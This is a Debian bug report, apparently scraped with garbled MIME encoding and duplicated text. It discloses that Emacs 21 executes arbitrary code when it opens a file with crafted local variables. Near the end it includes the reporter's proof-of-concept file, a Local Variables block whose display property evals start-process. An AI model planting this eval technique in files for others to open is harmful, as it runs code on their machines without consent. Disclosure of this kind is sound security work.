Package: emacs21
Version: 21.2-1
Severity: grave
Justification: user security hole
Hi.
In December 2002[sic!], Georgi Guninski <email address hidden> writes in
<email address hidden>:
> Attached file demonstrates GNU Emacs 21.2.1 starting process if a text fi=
le is=20
> opened. Just open it with emacs and check for processes "yes".
>=20
> I suggest disabling local variables by default, because probably there ar=
e=20
> similar bugs of the same nature.
You can view the thread for example at Google Groups:
I just tried it with emacs in Woody and indeed, the yes processes
started to spawn on a fast pace. I went even a bit further and found
out that the execution is not sandboxed in any way, as I was able to
execute a script that writes out a script in my home directory, chmod +x
it, and runs it in turn.
In the above thread, it's mentioned another security bug was found
earlier that week, so please take a look at it.
Cheers,
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.28-jan #2 Sat Nov 27 02:52:26 GMT 2004 i686
Locale: LANG=3DC, LC_CTYPE=3Dcs_CZ.ISO-8859-2
Versions of packages emacs21 depends on:
ii dpkg 1.9.21 Package maintenance system for=
Deb
ii emacsen-common 1.4.15 Common facilities for all emac=
sen.
ii libc6 2.2.5-11.5 GNU C Library: Shared librarie=
s an
ii libjpeg62 6b-5 The Independent JPEG Group's J=
PEG=20
ii liblockfile1 1.03 NFS-safe locking library, incl=
udes
ii libncurses5 5.2.20020112a-7 Shared libraries for terminal =
hand
ii libpng2 1.0.12-3.woody.9 PNG library - runtime
ii libtiff3g 3.5.5-6woody1 Tag Image File Format library
ii xaw3dg 1.5-13 Xaw3d widget set
ii xlibs 4.1.0-16woody5 X Window System client librari=
es
ii zlib1g 1:1.1.4-1.0woody0 compression library - runtime
Message-ID: <email address hidden>
Date: Sat, 18 Dec 2004 06:54:29 +0000
From: Jan Minar <email address hidden>
To: Debian Bug Tracking System <email address hidden>
Subject: emacs21: Arbitrary code execution when opening malicious file (local variables)
--eJnRUKwClWJh1Khz "opJtzjQTFsWo+ cga" Disposition: inline
Content-Type: multipart/mixed; boundary=
Content-
--opJtzjQTFsWo+cga Disposition: inline Transfer- Encoding: quoted-printable
Content-Type: text/plain; charset=iso-8859-2
Content-
Content-
Package: emacs21
Version: 21.2-1
Severity: grave
Justification: user security hole
Hi.
In December 2002[sic!], Georgi Guninski <email address hidden> writes in
<email address hidden>:
> Attached file demonstrates GNU Emacs 21.2.1 starting process if a text fi=
le is=20
> opened. Just open it with emacs and check for processes "yes".
>=20
> I suggest disabling local variables by default, because probably there ar=
e=20
> similar bugs of the same nature.
You can view the thread for example at Google Groups:
http:// groups- beta.google. com/group/ gnu.emacs. bug/browse_ frm/thread/ 9424ec1= hl=3Den& lr=3D&ie= 3DUTF-8& oe=3DUTF- 8&rnum= 3D1&prev= 3D/groups% 3Fq%3= 2Bemacs% 26hl%3Den% 26lr%3D% 26ie%3DUTF- 8%26oe% 3DUTF-8% 26selm% 3Dmail= 1041357806. 19936.bug- gnu-emacs% 2540gnu. org%26rnum% 3D1
b2fdae321?
Dguninski%
man.763.
The same url in Quoted Printable, in case it got mangled somehow en
route (run it thru recode /qp..):
http:// groups- beta.google. com/group/ gnu.emacs. bug/browse_ frm/thread/ 9424ec1= hl=3D3Den& lr=3D3D& ie=3D3DUTF- 8&oe=3D3DUTF- 8&rnum= 3D3D1&prev= 3D3D/= 2Bemacs% 26hl%3Den% 26lr%3D% 26ie%3DUTF- 8%26oe% 3DUTF-8% 26selm% 3Dmail= 1041357806. 19936.bug- gnu-emacs% 2540gnu. org%26rnum% 3D1
=3D
b2fdae321?
groups%3Fq%3=3D
Dguninski%
=3D
man.763.
Georgi's file is enclosed verbatim.
I just tried it with emacs in Woody and indeed, the yes processes
started to spawn on a fast pace. I went even a bit further and found
out that the execution is not sandboxed in any way, as I was able to
execute a script that writes out a script in my home directory, chmod +x
it, and runs it in turn.
In the above thread, it's mentioned another security bug was found
earlier that week, so please take a look at it.
Cheers, 3Dcs_CZ. ISO-8859- 2
-- System Information
Debian Release: 3.0
Architecture: i386
Kernel: Linux kontryhel 2.4.28-jan #2 Sat Nov 27 02:52:26 GMT 2004 i686
Locale: LANG=3DC, LC_CTYPE=
Versions of packages emacs21 depends on:
ii dpkg 1.9.21 Package maintenance system for=
Deb
ii emacsen-common 1.4.15 Common facilities for all emac=
sen.
ii libc6 2.2.5-11.5 GNU C Library: Shared librarie=
s an
ii libjpeg62 6b-5 The Independent JPEG Group's J=
PEG=20
ii liblockfile1 1.03 NFS-safe locking library, incl=
udes
ii libncurses5 5.2.20020112a-7 Shared libraries for terminal =
hand
ii libpng2 1.0.12-3.woody.9 PNG library - runtime
ii libtiff3g 3.5.5-6woody1 Tag Image File Format library
ii xaw3dg 1.5-13 Xaw3d widget set
ii xlibs 4.1.0-16woody5 X Window System client librari=
es
ii zlib1g 1:1.1.4-1.0woody0 compression library - runtime
--=20
)^o-o^| jabber: <email address hidden>
| .v K e-mail: jjminar FastMail FM
` - .' phone: +44(0)7981 738 696
\ __/Jan icq: 345 355 493
__|o|__Min=E1=F8 irc: <email address hidden>
--opJtzjQTFsWo+cga Disposition: attachment; filename= "emacs1. emacs" Transfer- Encoding: quoted-printable
Content-Type: text/plain; charset=us-ascii
Content-
Content-
/* -*- Mode: text; tab-width:20; Eval: Mode -*- -*- forms -*- */
Emacs better than windoze.
=20
;;; Local Variables: ***
;;; mode: text ***
;;; mode-name: #("Microsoft sux" 0 4 (display (when (eval (start-process "=
/usr/bin/yes" "/usr/bin/yes" "/usr/bin/yes" "msux") ) . xxx) ) ) ***
;;; comment-start: ";;; " ***
;;; comment-end:"***" ***
;;; End: ***
--opJtzjQTFsWo+ cga--
--eJnRUKwClWJh1Khz pgp-signature Disposition: inline
Content-Type: application/
Content-
-----BEGIN PGP SIGNATURE----- www.gnupg. org
uczK20Fa5cRAsbW AKCmepYq6FU3t9N HAxGtPu6kXstOqA CguN5G Kb8/gkjc=
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://
iD8DBQFBw9Ql+
f/TjmbX5NaR5HlU
=ddER
-----END PGP SIGNATURE-----
--eJnRUKwClWJh1 Khz--